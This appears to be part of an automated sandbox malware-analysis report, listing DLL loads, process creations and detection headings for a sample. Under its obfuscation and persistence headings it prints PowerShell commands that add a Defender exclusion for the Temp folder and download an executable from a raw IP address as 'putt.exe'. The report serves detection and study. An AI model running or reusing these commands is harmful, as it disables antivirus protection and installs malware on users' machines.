                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dbghelp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comSection loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "$alias = 'IEX'; $cmd = 'Add-MpPreference -ExclusionPath ''C:\Users\user\AppData\Local\Temp'''; & $alias $cmd"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\putt.exeCode function: 14_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,14_2_00406328
                    Source: putt.exe.9.drStatic PE information: real checksum: 0x13b848 should be: 0x144e84
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3458D2A5 pushad ; iretd 3_2_00007FFD3458D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A00BD pushad ; iretd 3_2_00007FFD346A00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD346A6EF2 push eax; ret 3_2_00007FFD346A6F59
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD346A08CD push E95A0A1Ch; ret 9_2_00007FFD346A0909
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD346A00BD pushad ; iretd 9_2_00007FFD346A00C1
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00740315 push cs; retn 0073h26_2_00740318
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_00710DE6 push ecx; ret 26_2_00710DF9
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0070DC7C push AA0074CFh; iretd 26_2_0070DC87

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comJump to dropped file
                    Tries to download and execute files (via powershell)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "(New-Object System.Net.WebClient).DownloadFile('http://5.252.155.64/lem.exe', 'C:\Users\user\AppData\Local\Temp\putt.exe')"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\putt.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comJump to dropped file

                    Boot Survival

                    barindex
                    Monitors registry run keys for changes
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_007826DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,26_2_007826DD
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 26_2_0070FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,26_2_0070FC7C
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
